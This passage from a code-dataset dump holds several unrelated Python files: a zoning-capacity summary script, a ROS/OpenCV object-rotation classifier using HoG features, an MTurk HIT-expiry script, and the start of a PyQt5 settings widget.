False)\n net_parcel_capacity_upzoning.to_csv('net_parcel_capacity_upzoning.csv', index = False)\n\n\n ## calculate jurisdiction-level capacity\n\n juris_raw_capacity_basezoning = summary_capacity(raw_parcel_capacity_basezoning, \n 'juris', \n [raw_metrics + '_basezoning' for raw_metrics in RAW_CAPACITY_CODES])\n\n juris_net_capacity_basezoning = summary_capacity(net_parcel_capacity_basezoning, \n 'juris', \n [net_metrics + '_basezoning' for net_metrics in NET_CAPACITY_CODES]) \n\n juris_raw_capacity_upzoning = summary_capacity(raw_parcel_capacity_upzoning, \n 'juris', \n [raw_metrics + '_' + args.zoningmods_scenario for raw_metrics in RAW_CAPACITY_CODES])\n\n juris_net_capacity_upzoning = summary_capacity(net_parcel_capacity_upzoning, \n 'juris', \n [net_metrics + '_' + args.zoningmods_scenario for 
net_metrics in NET_CAPACITY_CODES])\n\n\n ## calculate taz-level capacity\n taz_raw_capacity_basezoning = summary_capacity(raw_parcel_capacity_basezoning, \n 'ZONE_ID', \n [raw_metrics + '_basezoning' for raw_metrics in RAW_CAPACITY_CODES])\n\n taz_net_capacity_basezoning = summary_capacity(net_parcel_capacity_basezoning, \n 'ZONE_ID', \n [net_metrics + '_basezoning' for net_metrics in NET_CAPACITY_CODES]) \n\n taz_raw_capacity_upzoning = summary_capacity(raw_parcel_capacity_upzoning, \n 'ZONE_ID', \n [raw_metrics + '_' + args.zoningmods_scenario for raw_metrics in RAW_CAPACITY_CODES])\n\n taz_net_capacity_upzoning = summary_capacity(net_parcel_capacity_upzoning, \n 'ZONE_ID', \n [net_metrics + '_' + args.zoningmods_scenario for net_metrics in NET_CAPACITY_CODES])\n\n\n # merge to generate juris-level summary\n juris_capacity_compare = juris_raw_capacity_basezoning.merge(juris_net_capacity_basezoning,\n on = 'juris').merge(juris_raw_capacity_upzoning,\n on = 'juris').merge(juris_net_capacity_upzoning,\n on = 'juris')\n juris_capacity_compare.rename(columns = {'juris': 'jurisdiction'}, inplace = True)\n\n logger.debug(\"juris_capacity_compare.head():\\n{}\".format(juris_capacity_compare.head()))\n\n # merge to generate taz-level summary\n taz_capacity_compare = taz_raw_capacity_basezoning.merge(taz_net_capacity_basezoning,\n on = 'ZONE_ID').merge(taz_raw_capacity_upzoning,\n on = 'ZONE_ID').merge(taz_net_capacity_upzoning,\n on = 'ZONE_ID')\n logger.debug(\"taz_capacity_compare.head():\\n{}\".format(taz_capacity_compare.head()))\n\n ## Export data\n\n # export jurisdiction-level capacity comparison\n logger.info(\"Export development capacity comparison by jurisdiction: \\n{}\".format(juris_capacity_compare.dtypes))\n juris_capacity_compare.to_csv(COMPARE_JURIS_CAPACITY_FILE, index = False)\n\n # export taz-level capacity comparison\n logger.info(\"Export development capacity comparison by TAZ: \\n{}\".format(taz_capacity_compare.dtypes))\n taz_capacity_compare.to_csv(COMPARE_TAZ_CAPACITY_FILE, index = False)","sub_path":"policies/plu/calculate_upzoning_capacity.py","file_name":"calculate_upzoning_capacity.py","file_ext":"py","file_size_in_byte":26415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"256574652","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport rospy\nimport numpy as np\nimport cv2\nfrom cv_bridge import CvBridge\nimport random\nfrom skimage.feature import hog\nfrom sklearn.linear_model import SGDClassifier\nimport pickle\nimport os\nimport time\nimport bufferImageMsg\n\n#############\n# Constants #\n#############\n\nWIDTH = 1280\nHEIGHT = 960\n\nNB_MSG_MAX = 50\nNB_MAX_DEPTH_IMG = 30\n\nNB_IMG_FOR_LEARN = 30\n\nLRN_PATH = './LRN_IMGS/'\nTEST_PATH = './TST_IMGS/'\n\nMAIN_WINDOW = \"Controls\"\n\nSHOW_COLOR_IMG = \"Show color img\"\nSHOW_DEPTH_IMG = \"Show depth img\"\n\nLEARN_FROM_DISK = \"Learn from DISK\"\nTEST_FROM_DISK = \"Test\"\nUNKNOWN_OBJECT = \"Unknown?\"\n\nRUN_NAME = \"Run\"\n\n\n#########\n# Class #\n#########\n\nclass ImgAveraging:\n def __init__(self, nb_max):\n self.__NB_MAX_REF = nb_max\n self.__NB_MAX = nb_max\n self.__nb_stock = 0\n 
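# ring buffer: __first indexes the oldest stored frame and __last the next write\n # slot; the running __img_sum lets average() avoid re-summing all stored frames\n 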
self.__first = 0\n self.__last = 0\n self.__img_sum = 0\n\n def new_img(self, img):\n if self.__nb_stock == self.__NB_MAX:\n self.__img_sum -= self.__peek()\n\n self.__img_sum += img\n self.__push(img)\n\n def __peek(self):\n item = None\n\n if self.__nb_stock > 0:\n item = self.__container[self.__first]\n\n return item\n\n def __pop(self):\n item = None\n\n if self.__nb_stock > 0:\n item = self.__container[self.__first]\n self.__first += 1\n self.__first %= self.__NB_MAX\n self.__nb_stock -= 1\n\n return item\n\n def __push(self, img):\n # erase first item if the container is full\n if self.__nb_stock == self.__NB_MAX:\n self.__pop()\n\n self.__container[self.__last] = img\n self.__last += 1\n self.__last %= self.__NB_MAX\n self.__nb_stock += 1\n\n\n####################\n# Global variables #\n####################\nb_size = 64 # 15 block size\nb_stride = 32\nc_size = 32 # 15 cell size\ncallback_rgb_timer = 0\nclf = SGDClassifier(loss='log')\ncolor = ''\ncolor_buffer_msg = bufferImageMsg.BufferImageMsg(NB_MSG_MAX)\ncolor_img = np.array([[0]])\ndebug_flag = 1\ndepth_buffer_msg = bufferImageMsg.BufferImageMsg(1)\ndepth_capture = 0.03\ndepth_img = np.array([[0]])\ndepth_img_averaging = ImgAveraging(NB_MAX_DEPTH_IMG)\nhog_list = list()\nimg_bgr8_clean = np.array([[0]])\nimg_clean_bgr_learn = np.array([[0]])\nimg_clean_gray_class = np.array([[0]])\ninteractions_flag = 0\nimplements_p_fit = 1\nlabel = ''\nlabels = list()\nlast_hog = 0\nlearn_flag = 0\nlive_cnt = 0\nlive_flag = 0\nloaded_flag = 0\nn_bin = 6 # 4 # number of orientations for the HoG\nnb_depth_img = 30\nrecording_flag = 0\nrotation = 0\nrun_flag = 0\nsaved_flag = 0\nsaving_learn = 0\nsaving_test = 0\nshow_color_img_flag = 0\nshow_depth_img_flag = 0\nshow_flag = 1\nshuffled_x = list()\nshuffled_y = list()\nstart_time2 = 0\n\n# __TEST__\nbegin_learn = 0\nend_learn = 0\n\n\n######################\n# Callback functions #\n######################\n\ndef depth_capture_callback(n):\n global depth_capture\n if n == 0:\n n = 1\n depth_capture = float(n) / 100\n\n\ndef learn_from_disk_callback(value):\n global begin_learn\n global learn_flag\n global show_flag\n\n learn_from_disk()\n learn_flag = 1\n\n\ndef run_callback(value):\n global run_flag\n run_flag = value\n\n\ndef main_callback(_):\n get_color_img()\n get_depth_img()\n\n show_color_img()\n show_depth_img()\n\n if run_flag == 1:\n filter_by_depth()\n cv2.waitKey(1)\n\n\ndef nb_depth_img_callback(n):\n global nb_depth_img\n nb_depth_img = n\n if nb_depth_img <= 0:\n nb_depth_img = 1\n\n\ndef show_color_img_callback(value):\n global show_color_img_flag\n show_color_img_flag = value\n\n\ndef show_depth_img_callback(value):\n global show_depth_img_flag\n show_depth_img_flag = value\n\n\ndef test_from_disk_callback(value):\n if value == 1:\n test_from_disk()\n\n\ndef unknown_object_callback(value):\n if value == 1:\n color_buffer_msg.run(NB_IMG_FOR_LEARN)\n\n\n#############\n# Functions #\n#############\n\ndef clean(img, n):\n # set the non-finite values (NaN, inf) to n\n # returns 1 where the img is finite and 0 where it is not\n mask = np.isfinite(img)\n # where mask puts img, else puts n, so where is finite puts img, else puts n\n return np.where(mask, img, n)\n\n\ndef filter_by_depth():\n # Uses the depth image to only take the part of the image corresponding to the closest point and a bit further\n global depth_img_averaging\n\n depth_img_avg = depth_img_averaging.average()\n closest_pnt = np.amin(depth_img_avg)\n depth_img_avg = cv2.resize(depth_img_avg, (WIDTH, HEIGHT))\n depth_range 
= closest_pnt + depth_capture\n # generate a mask with the closest points\n img_detection = np.where(depth_img_avg < depth_range, depth_img_avg, 0)\n # put all the pixels greater than 0 to 255\n ret, mask = cv2.threshold(img_detection, 0.0, 255, cv2.THRESH_BINARY)\n mask = np.array(mask, dtype=np.uint8) # convert to 8-bit\n im2, contours, hierarchy = cv2.findContours(mask, 1, 2, offset=(0, -6))\n biggest_cont = contours[0]\n for cnt in contours:\n if cv2.contourArea(cnt) > cv2.contourArea(biggest_cont):\n biggest_cont = cnt\n min_area_rect = cv2.minAreaRect(biggest_cont) # minimum area rectangle that encloses the contour cnt\n (center, size, angle) = cv2.minAreaRect(biggest_cont)\n points = cv2.boxPoints(min_area_rect) # Find four vertices of rectangle from above rect\n points = np.int32(np.around(points)) # Round the values and make it integers\n img_bgr8_clean_copy = img_bgr8_clean.copy()\n cv2.drawContours(img_bgr8_clean_copy, [points], 0, (0, 0, 255), 2)\n cv2.drawContours(img_bgr8_clean_copy, biggest_cont, -1, (255, 0, 255), 2)\n cv2.namedWindow('RBG', cv2.WINDOW_NORMAL)\n cv2.imshow('RBG', img_bgr8_clean_copy)\n cv2.waitKey(1)\n # if we rotate more than 90 degrees, the width becomes height and vice-versa\n if angle < -45.0:\n angle += 90.0\n width, height = size[0], size[1]\n size = (height, width)\n rot_matrix = cv2.getRotationMatrix2D(center, angle, 1.0)\n # rotate the entire image around the center of the parking cell by the\n # angle of the rotated rect\n img_width, img_height = (img_bgr8_clean.shape[0], img_bgr8_clean.shape[1])\n rotated = cv2.warpAffine(img_bgr8_clean, rot_matrix, (img_height, img_width), flags=cv2.INTER_CUBIC)\n # extract the rect after rotation has been done\n size_int = (np.int32(size[0]), np.int32(size[1]))\n up_right_rect = cv2.getRectSubPix(rotated, size_int, center)\n # up_right_rect_copy = up_right_rect.copy()\n # cv2.drawContours(up_right_rect_copy, [points], 0, (0, 0, 255), 2)\n # cv2.imshow('uprightRect', up_right_rect_copy)\n objects_detector(up_right_rect)\n\n\ndef get_color_img():\n global color_buffer_msg, color_img, img_bgr8_clean\n\n msg = color_buffer_msg.get_last_img_msg()\n if msg is not None:\n color_img = CvBridge().imgmsg_to_cv2(msg, \"bgr8\")\n img_bgr8_clean = color_img[32:992, 0:1280]\n\n\ndef get_depth_img():\n global depth_buffer_msg, depth_img, depth_img_averaging\n\n msg = depth_buffer_msg.get_last_img_msg()\n if msg is not None:\n clean_img = clean(CvBridge().imgmsg_to_cv2(msg, \"passthrough\"), 255)\n depth_img = clean_img\n depth_img_averaging.new_img(depth_img)\n\n\ndef get_img_rot(img_bgr):\n img_clean_gray_class_local = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2GRAY)\n best_rot = 0\n best_perc = 0\n # noinspection PyArgumentList\n opencv_hog = cv2.HOGDescriptor((128, 128), (b_size, b_size), (b_stride, b_stride), (c_size, c_size), n_bin)\n for i in range(4):\n # Calculate HoG\n h1 = opencv_hog.compute(img_clean_gray_class_local)\n fd = (np.reshape(h1, (len(h1),)))\n fd = fd.reshape(1, -1)\n for percentage in clf.predict_proba(fd)[0]:\n if percentage > best_perc:\n best_perc = percentage\n best_rot = i\n rows, cols = img_clean_gray_class_local.shape\n m = cv2.getRotationMatrix2D((cols / 2, rows / 2), 90, 1)\n img_clean_gray_class_local = cv2.warpAffine(img_clean_gray_class_local, m, (cols, rows))\n return best_rot\n\n\ndef hog_info():\n global labels\n global hog_list\n print ('Current labels = ')\n myset = set(labels)\n print (str(myset))\n print ('Current HoG size:')\n print (len(hog_list))\n\n\ndef hog_pred():\n global n_bin\n 
global b_size\n global c_size\n global img_clean_gray_class\n global clf\n opencv_hog = cv2.HOGDescriptor((128, 128), (b_size, b_size), (b_stride, b_stride), (c_size, c_size), n_bin)\n fd = opencv_hog.compute(img_clean_gray_class)\n fd = np.reshape(fd, (len(fd),))\n fd = fd.reshape(1, -1)\n print (clf.predict([fd]))\n\n\ndef learn():\n print ('Learning')\n start_time = time.time()\n global hog_list\n global labels\n classes = np.unique(labels).tolist()\n if implements_p_fit == 1:\n for i in range(10):\n classes.append('new' + str(i))\n print (classes)\n global shuffled_x\n global shuffled_y\n shuffledrange = range(len(labels))\n if implements_p_fit == 1:\n for i in range(5):\n random.shuffle(shuffledrange)\n shuffled_x = [hog_list[i] for i in shuffledrange]\n shuffled_y = [labels[i] for i in shuffledrange]\n print (len(shuffled_x))\n for i2 in range(10):\n print (i2)\n clf.partial_fit(shuffled_x[i2 * len(shuffled_x) / 10:(i2 + 1) * len(shuffled_x) / 10], shuffled_y[i2 * len(shuffled_x) / 10:(i2 + 1) * len(shuffled_x) / 10], classes)\n else:\n shuffledrange = range(len(labels))\n random.shuffle(shuffledrange)\n # SHUFFLED_X = HOG_LIST\n # SHUFFLED_Y = LABELS\n shuffled_x = [hog_list[i] for i in shuffledrange]\n shuffled_y = [labels[i] for i in shuffledrange]\n clf.fit(shuffled_x, shuffled_y)\n print ('Done Learning')\n print('Elapsed Time Learning = ' + str(time.time() - start_time) + '\\n')\n\n\n\ndef learn_from_disk():\n global label\n i = 0\n start_time = 0\n for filename in os.listdir(LRN_PATH):\n if (i % 20) == 0:\n start_time = rospy.get_time()\n imagee = cv2.imread(LRN_PATH + filename)\n learn_hog(imagee)\n if (i % 20) == 0:\n print('Elapsed Time Learning Image ' + str(i) + ' = ' + str(rospy.get_time() - start_time) + '\\n')\n i += 1\n learn()\n print ('Done')\n\n\ndef learn_hog(img):\n global n_bin\n global b_size\n global c_size\n global hog_list\n global labels\n global live_flag\n global show_flag\n\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n w, l = np.shape(img)\n img_list = list()\n img_list.append((img[:, :])) # no changes\n\n if live_flag == 0:\n for i in range(1, 12, 2):\n img_list.append((img[0:w - i, :])) # cut right\n img_list.append((img[i:, :])) # cut left\n img_list.append((img[:, i:])) # cut up\n img_list.append((img[:, 0:l - i])) # cut down\n img_list.append((img[:, i:l - i])) # cut up and down\n img_list.append((img[i:w - i, :])) # cut left and right\n img_list.append((img[i:, i:l - i])) # cut up and down and left\n img_list.append((img[:w - i, i:l - i])) # cut up and down and right\n img_list.append((img[i:w - i, i:l - i])) # cut up and down and left and right\n else:\n for i in range(3, 12, 3):\n img_list.append((img[0:w - i, :])) # cut right\n img_list.append((img[i:, :])) # cut left\n img_list.append((img[:, i:])) # cut up\n img_list.append((img[:, 0:l - i])) # cut down\n img_list.append((img[:, i:l - i])) # cut up and down\n img_list.append((img[i:w - i, :])) # cut left and right\n img_list.append((img[i:, i:l - i])) # cut up and down and left\n img_list.append((img[:w - i, i:l - i])) # cut up and down and right\n img_list.append((img[i:w - i, i:l - i])) # cut up and down and left and right\n index = 0\n # print('Elapsed Time Pre HoG = ' + str(time.time() - start_time) + '\\n')\n # noinspection PyArgumentList\n opencv_hog = cv2.HOGDescriptor((128, 128), (b_size, b_size), (b_stride, b_stride), (c_size, c_size), n_bin)\n for imgs in img_list:\n imgs = cv2.resize(imgs, (128, 128), interpolation=cv2.INTER_AREA) # resize image\n if show_flag == 1:\n 
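# visual sanity check: preview each augmented crop before computing its HoG\n 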
cv2.imshow('img' + str(index), imgs)\n index += 1\n h1 = opencv_hog.compute(imgs)\n h1 = (np.reshape(h1, (len(h1),)))\n hog_list.append((np.reshape(h1, (len(h1),))))\n # print (HOG_LIST)\n # HOG_LIST.append(hog(imgs, orientations=n_bin, pixels_per_cell=(c_size, c_size),\n # cells_per_block=(b_size / c_size, b_size / c_size), visualise=False))\n if not live_flag == 1:\n labels.append(label)\n else:\n labels.append('new0')\n # print('Elapsed Time on HoG = ' + str(time.time() - start_time) + '\\n')\n\n\ndef load_class():\n global hog_list\n global labels\n global loaded_flag\n\n with open('../data/HOG_N_LABELS/HOG_N_LABELS.pickle') as f:\n hog_tuple = pickle.load(f)\n hog_list = hog_tuple[0]\n labels = hog_tuple[1]\n loaded_flag = 1\n print ('Loaded')\n\n\ndef objects_detector(img_bgr8):\n global b_size\n global c_size\n global callback_rgb_timer\n global clf\n global debug_flag\n global hog_list\n global img_clean_bgr_learn\n global img_clean_gray_class\n global interactions_flag\n global labels\n global last_hog\n global live_cnt\n global live_flag\n global n_bin\n global recording_flag\n global saved_flag\n global saving_learn\n global saving_learn\n global saving_test\n global show_flag\n global shuffled_x\n global shuffled_y\n global start_time2\n\n objects_detector_time = rospy.get_time()\n width, height, d = np.shape(img_bgr8)\n if width > 130 or height > 130:\n return\n if width < 100 or height < 100:\n return\n # noinspection PyUnusedLocal\n detected_objects_list = []\n w, l, d = np.shape(img_bgr8)\n img_clean_bgr_learn = img_bgr8[2:w - 2, 2:l - 2].copy()\n # cv2.imshow('Learn', img_clean_bgr_learn)\n img_bgr8 = img_bgr8[7:w - 4, 9:l - 8]\n img_clean_bgr_class = img_bgr8.copy()\n img_clean_bgr_class = cv2.resize(img_clean_bgr_class, (120, 120), interpolation=cv2.INTER_AREA) # resize image\n img_clean_gray_class = cv2.cvtColor(img_clean_bgr_class, cv2.COLOR_BGR2GRAY)\n cv2.imshow('Clean', img_clean_bgr_class)\n\n if recording_flag == 1:\n\n learn_hog(img_clean_bgr_learn)\n # HOG_LIST.append(last_hog)\n # labels.append(LABEL)\n interactions_flag += 1\n print (interactions_flag)\n if interactions_flag == 20:\n recording_flag = 0\n interactions_flag = 0\n print ('Done recording')\n\n # to learn with human\n if saving_learn == 1:\n cv2.imwrite('LRN_IMGS/' + label + '_' + str(saved_flag) + '_' + color + '.png', img_clean_bgr_learn)\n saved_flag += 1\n print (saved_flag)\n if saved_flag == 3:\n saving_learn = 0\n saved_flag = 0\n print ('Done saving')\n\n cv2.imshow('Save_test', img_clean_bgr_class)\n\n # to learn with human\n if saving_test == 1:\n cv2.imwrite('TST_IMGS/' + label + '_' + str(rotation) + '_' +\n str(saved_flag) + '_' + color + '.png', img_clean_bgr_class)\n saved_flag += 1\n print (saved_flag)\n if saved_flag == 20:\n saving_test = 0\n saved_flag = 0\n print ('Done saving')\n best_rot = 0\n best_perc = 0\n\n # to learn alone\n if live_flag == 1:\n start_time3 = rospy.get_time()\n if live_cnt == 0:\n start_time2 = rospy.get_time()\n live_cnt = 100\n nb_depth_img_callback(1)\n hog_list = list()\n labels = list()\n hog_list.extend(shuffled_x[1:int(len(shuffled_x) * (1.0 / len((np.unique(shuffled_y)))))])\n labels.extend(shuffled_y[1:int(len(shuffled_x) * (1.0 / len(np.unique(shuffled_y))))])\n learn_hog(img_bgr8)\n shuffled_range = range(len(labels))\n shuffled_x_temp = []\n shuffled_y_temp = []\n for i in range(5):\n random.shuffle(shuffled_range)\n shuffled_x_temp = [hog_list[i] for i in shuffled_range]\n shuffled_y_temp = [labels[i] for i in shuffled_range]\n print 
(live_cnt)\n live_cnt -= 1\n if live_cnt == 0:\n start_time = rospy.get_time()\n clf.partial_fit(shuffled_x_temp, shuffled_y_temp)\n print('Elapsed Time LEARNING = ' + str(rospy.get_time() - start_time) + '\\n')\n live_flag = 0\n nb_depth_img_callback(NB_MAX_DEPTH_IMG)\n print('Elapsed Time TOTAL = ' + str(rospy.get_time() - start_time2)\n + ' FPS = ' + str(100 / (rospy.get_time() - start_time2)) + '\\n')\n print('Elapsed Time Single Example = ' + str(rospy.get_time() - start_time3) + '\\n')\n print('Elapsed Time Single Example Obj Detc = ' + str(rospy.get_time() - objects_detector_time) + '\\n')\n\n print('Elapsed Time Single Example RGB callback = ' + str(rospy.get_time() - callback_rgb_timer) + '\\n')\n\n if show_flag == 0:\n return\n\n # fd, hog_image = hog(img_clean_GRAY_class, orientations=n_bin, pixels_per_cell=(c_size, c_size),\n # cells_per_block=(b_size / c_size, b_size / c_size), visualise=True)\n # fd = np.reshape(fd, (32, 8))\n # fd_new = np.roll(fd, 2, axis=1)\n # fd_new = np.reshape(fd, (1, 32*8))[0]\n # print ('New')\n # print(fd_new[0:20])\n # print (len(fd_new))\n # rows, cols = img_clean_GRAY_class.shape\n # m = cv2.getRotationMatrix2D((cols / 2, rows / 2), 90, 1)\n # img_clean_bgr_class = cv2.warpAffine(img_clean_bgr_class, m, (cols, rows))\n # fd, hog_image = hog(img_clean_GRAY_class, orientations=n_bin, pixels_per_cell=(c_size, c_size),\n # cells_per_block=(b_size / c_size, b_size / c_size), visualise=True)\n # print ('Rotated Original')\n # print (fd[0:20])\n # print (len(fd))\n\n # fd2, hog_image = hog(img_clean_GRAY_class, orientations=n_bin, pixels_per_cell=(c_size, c_size),\n # cells_per_block=(b_size / c_size, b_size / c_size), visualise=True)\n # noinspection PyArgumentList\n opencv_hog = cv2.HOGDescriptor((128, 128), (b_size, b_size), (b_stride, b_stride), (c_size, c_size), n_bin)\n\n for i in range(4):\n # fd2_ori = fd2.copy()\n # fd2 = fd2.reshape(1, -1)\n # fd, hog_image = hog(img_clean_GRAY_class, orientations=n_bin, pixels_per_cell=(c_size, c_size),\n # cells_per_block=(b_size / c_size, b_size / c_size), visualise=True)\n\n img_clean_gray_class = cv2.resize(img_clean_gray_class, (128, 128))\n\n fd4 = opencv_hog.compute(img_clean_gray_class)\n\n # fd_ori = fd.copy()\n fd4 = fd4.reshape(1, -1)\n for percentage in clf.predict_proba(fd4)[0]:\n if percentage > best_perc:\n best_perc = percentage\n best_rot = i\n # fd = fd_ori\n # fd2 = fd2_ori\n rows, cols = img_clean_gray_class.shape\n m = cv2.getRotationMatrix2D((cols / 2, rows / 2), 90, 1)\n img_clean_gray_class = cv2.warpAffine(img_clean_gray_class, m, (cols, rows))\n # fd2 = np.reshape(fd2, (32, 8))\n # if not i == 0:\n # fd2 = np.roll(fd2, 2, axis=1)\n # fd2 = np.reshape(fd2, (1, 32*8))[0]\n # print ('Original')\n # print (fd[0:20])\n # print ('Fake')\n # print (fd2[0:20])\n if debug_flag == 1:\n # print clf.predict(fd)\n print (best_perc)\n print ('\\n')\n\n # print (best_rot)\n if not best_rot == 0:\n rows, cols, d = img_clean_bgr_class.shape\n m = cv2.getRotationMatrix2D((cols / 2, rows / 2), best_rot * 90, 1)\n img_clean_bgr_class = cv2.warpAffine(img_clean_bgr_class, m, (cols, rows))\n cv2.imshow('Sent', cv2.resize(img_clean_bgr_class, (256, 256)))\n\n # detected_object = Detected_Object()\n # detected_object.id = count\n # detected_object.image = CvBridge().cv2_to_imgmsg(img_bgr8_resized, encoding=\"passthrough\")\n # detected_object.center_x = unrot_center_x / float(resolution_x) # proportion de la largeur\n # detected_object.center_y = unrot_center_y / float(resolution_x) # proportion de la 
largeur aussi\n # detected_object.features = getpixelfeatures(object_img_rgb)\n # detected_object.features.hog_histogram = GetHOGFeatures(object_img_rgb)\n # detected_objects_list.append(detected_object)\n # if interactive == 1:\n # if len(detected_objects_list) > 1:\n # VAL_DEPTH_CAPTURE -= 0.01\n # if len(detected_objects_list) < 1:\n # VAL_DEPTH_CAPTURE += 0.01\n # detected_objects_list_msg = Detected_Objects_List()\n # detected_objects_list_msg.detected_objects_list = detected_objects_list\n # detected_objects_list_publisher.publish(detected_objects_list_msg)\n\n # cv2.rectangle(img_copy, (margin, margin), (resolution_x - margin, resolution_y - margin), (255, 255, 255))\n # cv2.imshow('detected_object', img_copy)\n # try:\n # img_bgr8_resized\n # except NameError:\n # pass\n # else:\n # if 1:\n # cv2.imshow('a', img_bgr8_resized)\n # cv2.imshow('ROTATED', rotated_img_obj)\n # cv2.imshow('With Cnt', object_img_rgb2)\n # cv2.waitKey(1)\n\n\ndef save_hog():\n global clf\n hog_tuple = (hog_list, labels)\n # print ('Hog = ' + str(hog_tuple[0]))\n print ('labels = ' + str(np.unique(hog_tuple[1])))\n # clf.fit(hog_tuple[0], hog_tuple[1])\n with open('HOG_N_LABELS/HOG_N_LABELS.pickle', 'w') as f:\n pickle.dump(hog_tuple, f)\n # joblib.dump(clf, 'Classifier/filename.pkl')\n print ('Done')\n\n\ndef save_img_learn():\n global label, color, saving_learn\n mode = str(raw_input('Label: '))\n label = mode\n color_ = str(raw_input('Color: '))\n color = color_\n saving_learn = 1\n\n\ndef save_img_test():\n global label, color, rotation, saving_test\n mode = str(raw_input('Label: '))\n label = mode\n color_ = str(raw_input('Color: '))\n color = color_\n rotation = str(raw_input('Rotation: '))\n saving_test = 1\n\n\ndef show_color_img():\n if show_color_img_flag == 1:\n cv2.namedWindow(\"Color Img\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"Color Img\", color_img)\n else:\n cv2.destroyWindow(\"Color Img\")\n\n\ndef show_controls_window():\n print(\"Show controls' window\")\n cv2.namedWindow(MAIN_WINDOW, cv2.WINDOW_NORMAL)\n\n cv2.createTrackbar(RUN_NAME, MAIN_WINDOW, 0, 1, run_callback)\n cv2.createTrackbar(SHOW_COLOR_IMG, MAIN_WINDOW, 0, 1, show_color_img_callback)\n cv2.createTrackbar(SHOW_DEPTH_IMG, MAIN_WINDOW, 0, 1, show_depth_img_callback)\n cv2.createTrackbar(LEARN_FROM_DISK, MAIN_WINDOW, 0, 1, learn_from_disk_callback)\n cv2.createTrackbar(TEST_FROM_DISK, MAIN_WINDOW, 0, 1, test_from_disk_callback)\n cv2.createTrackbar(UNKNOWN_OBJECT, MAIN_WINDOW, 0, 1, unknown_object_callback)\n cv2.createTrackbar('Capture Range', MAIN_WINDOW, int(100 * depth_capture), 150, depth_capture_callback)\n\n cv2.imshow(MAIN_WINDOW, 0)\n\n\ndef show_depth_img():\n if show_depth_img_flag == 1:\n cv2.namedWindow(\"Depth Img\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"Depth Img\", depth_img)\n # cv2.imshow(\"Depth Img\", depth_img_averaging.average())\n else:\n cv2.destroyWindow(\"Depth Img\")\n\n\ndef test_from_disk():\n print ('Testing from disk')\n start_time = rospy.get_time()\n total = 0\n failure = 0\n for filename in os.listdir(TEST_PATH):\n total += 1\n rotation_num = int(filename.rsplit('_', 3)[1])\n # print ('Label ' + str(LABEL))\n # print 'Rotation ' + str(ROTATION)\n imagee = cv2.imread(TEST_PATH + filename)\n imagee = cv2.resize(imagee, (128, 128))\n found_rot = get_img_rot(imagee)\n if not abs(rotation_num - found_rot) < 0.5:\n # print ('Testing ' + str(filename))\n failure += 1\n # print ('Does not work')\n # cv2.imshow('Did not work',imagee)\n # cv2.waitKey(100)\n # print (found_rot)\n # print (ROTATION)\n percentage = 
100 * failure / total\n print ('Failure = ' + str(percentage) + '%')\n print ('Failures = ' + str(failure))\n print('Elapsed Time Testing = ' + str(rospy.get_time() - start_time) + '\\n')\n print ('Done')\n\n\n#################\n# Main function #\n#################\n\nif __name__ == '__main__':\n rospy.init_node('imageToObjects_inQuickTime', anonymous=True)\n\n rospy.Timer(rospy.Duration(0.02), main_callback)\n\n show_controls_window()\n\n color_buffer_msg.set_subscriber(\"/camera/rgb/image_rect_color\")\n depth_buffer_msg.set_subscriber(\"/camera/depth_registered/image_raw\")\n\n depth_buffer_msg.run()\n color_buffer_msg.run()\n\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print (\"Shutting down\")\n exit(1)\n cv2.destroyAllWindows()\n","sub_path":"catkin_ws/src/robot_interaction_experiment/scripts/Not_used/imageToObjects_inQuickTime.py","file_name":"imageToObjects_inQuickTime.py","file_ext":"py","file_size_in_byte":25772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"601273926","text":"\"\"\"\nExpires the HITs listed in a file, one HIT id per line\n\"\"\"\n\nimport argparse\nimport collections\nimport json\nimport sys\nfrom datetime import datetime\nimport mturk_utils as m\nimport boto3\nimport functools\nclient = None\n\ndef parse_args():\n parser = argparse.ArgumentParser('Expire HITs')\n parser.add_argument('hits', type=str, help='file with one hit id per line')\n parser.add_argument('--is-sandbox', action='store_true', default=False)\n return parser.parse_args()\n\ndef main():\n is_sandbox = OPTS.is_sandbox\n global client\n client = m.get_mturk_client(is_sandbox=is_sandbox)\n print(client.get_account_balance()['AvailableBalance'])\n hits = open(OPTS.hits, 'r').readlines()\n for h in hits:\n expire(h.strip())\n\ndef expire(hit_id):\n status = 'NA'\n prev_status = 'NA'\n try:\n response = client.get_hit(HITId=hit_id)\n prev_status = response['HIT']['Expiration']\n response = client.update_expiration_for_hit(\n HITId=hit_id,\n ExpireAt=datetime(2015, 1, 1)\n )\n status = response['HIT']['Expiration']\n except client.exceptions.RequestError as e:\n status = 'RequestError: ' + str(e)\n print(prev_status, '->', status)\n\n\nif __name__ == '__main__':\n OPTS = parse_args()\n main()\n","sub_path":"scripts/expire_hits.py","file_name":"expire_hits.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"121417810","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import pyqtSignal\nimport sys, os.path as op\npath1 = op.join( op.abspath(op.dirname(__file__)), '..', '..')\npath2 = op.join( op.abspath(op.dirname(__file__)), '..')\nsys.path.append(path1)\nsys.path.append(path2)\nfrom Structure import *\nfrom .MainCategoriesVision import *\nfrom .MainAlternativesVision import *\nfrom SubCriteriasVision import *\n\nclass MainRadioButton( QtWidgets.QWidget ):\n ''' Object mode window '''\n \n is_changed = pyqtSignal()\n def __init__( self, main_obj, parent=None ):\n \n super().__init__( parent=parent )\n \n self.main_obj = main_obj\n \n # Create a label and two radio buttons\n label = QtWidgets.QLabel(\"Сложность модели\")\n \n setTrueButton = QtWidgets.QRadioButton(\"Две категории\")\n setFalseButton = QtWidgets.QRadioButton(\"Четыре категории\")\n \n # Connect one of the buttons to the handler and make it the default selection\n setTrueButton.toggled.connect( self.setTrue )\n setTrueButton.setChecked(True)\n \n box = 
